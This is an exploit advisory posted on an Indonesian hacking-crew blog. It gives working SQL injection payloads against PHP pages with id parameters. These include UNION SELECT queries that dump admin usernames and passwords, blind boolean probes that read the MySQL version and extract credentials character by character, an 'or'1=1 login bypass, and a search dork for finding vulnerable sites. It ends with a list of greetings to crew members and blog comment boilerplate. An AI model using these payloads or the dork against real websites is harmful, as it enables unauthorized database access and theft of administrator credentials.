./Sql Injection Vulnerability =======================================================
#######################################################
.:. Author : LOL1ds .:. Team : IndonesianHacker Team .:. Home : LOLids0nline[dot]blogspot[dot]com. .:. Bug Type : Sql Injection[Mysql] .:. Dork : home.php?id=[LOL] #######################################################
Sql Injection [MYSQL] ===[ Exploit ]=== [-]www.localhost.com/home.php?id=37[Sql Injection] [-]www.localhost .com/home.php?id=37/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,
group_concat(username,0x3a,password),7/**/from/**/admin [-]www.localhost .com/bar_detail.php?id=null[Sql Injection] www.localhost .com/bar_detail.php?id=null'/**/and/**/1=2/**/UNION/**/
SELECT/**/1,group_concat(username,0x3a,password)
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
,24,25,26,27,28/**/from/**/admin-- -
[+]Sql Injection [Blind] ===[ Exploit ]=== [-]www.localhost .com/propertydetails.php?Id=null[LOL] [-]www.localhost .com/propertydetails.php?Id=null+and+1=1 >>> True [-]www.localhost .com/propertydetails.php?Id=null+and+1=2 >>> False [+]www.localhost .com/propertydetails.php?Id=null+and+substring(@@version,1,1)=4
>>> True [+]www.localhost .com/propertydetails.php?Id=null+and+substring(@@version,1,1)=5
>>> False [+]www.localhost .com/propertydetails.php?Id=null+and+(select substring(concat
(1,concat(name,0x3a,password)),1,1) from admin limit 0,1)=1
./Sql Injection [Auth Bypass] ===[ Exploit ]=== www.site.com/admin/ Username: 'or'1=1 Passowrd: 'or'1=1 :) http://server/admin/ ./DEmo Site: http://localhost/home.php?id=37/**/and/**/1=2/**/
union/**/select/**/1,2,3,4,5,group_concat%28username,0x3a,password%29,
7/**/from/**/admin
greetz : | kaMtiEz | Sudden_death | sik4mpret | Syst3m_RtO | iJoo | otong |
| FLYFF666 | james0baster | gr33nc0d3 | deHanz | Roby_cool |
| Chaer | Wahyu_devilzc0de | ELV1N4 | r3m1ck | vYc0d | CS-31 | Cah Surip | Bumble_be | bL4Ck_3n91n3 | SyNTaX ErRoR | MISTERFRIBO | Kimmonosz | Bocah|Dudul | tukulesto | petimati | bl4ck_sh4d0w | mydoms | Aa |Ch3rub1m | Bobyhikaru | kiLL3r_m4chine | YaDoY666 | demnas | rinowengi666 | ICH43 | and YOU !! |
credit: indonesianhackerteam.com
##################################################
Article information:
Description: Sql Injection Mysql
Rating: 4.5
- Reviewer: LolidsOfficialBlog
- ItemReviewed: Sql Injection Mysql
0 komentar Post :
Sql Injection Mysql
Blog ini adalah dengan PageRank , sobat akan mendapatkan Backlink untuk BLOG anda dengan berkomentar di Blog ini. Jangan ada komentar Spam, Please!!.
"Jika Menemukan LINK yg Tidak bisa di akses pada BLOG ini!, silahkan beritahu kepada kami melalui Komentar, Form, etc . sesegera mungkin kami akan memperbaikinya. Terimakasih"
Post a Comment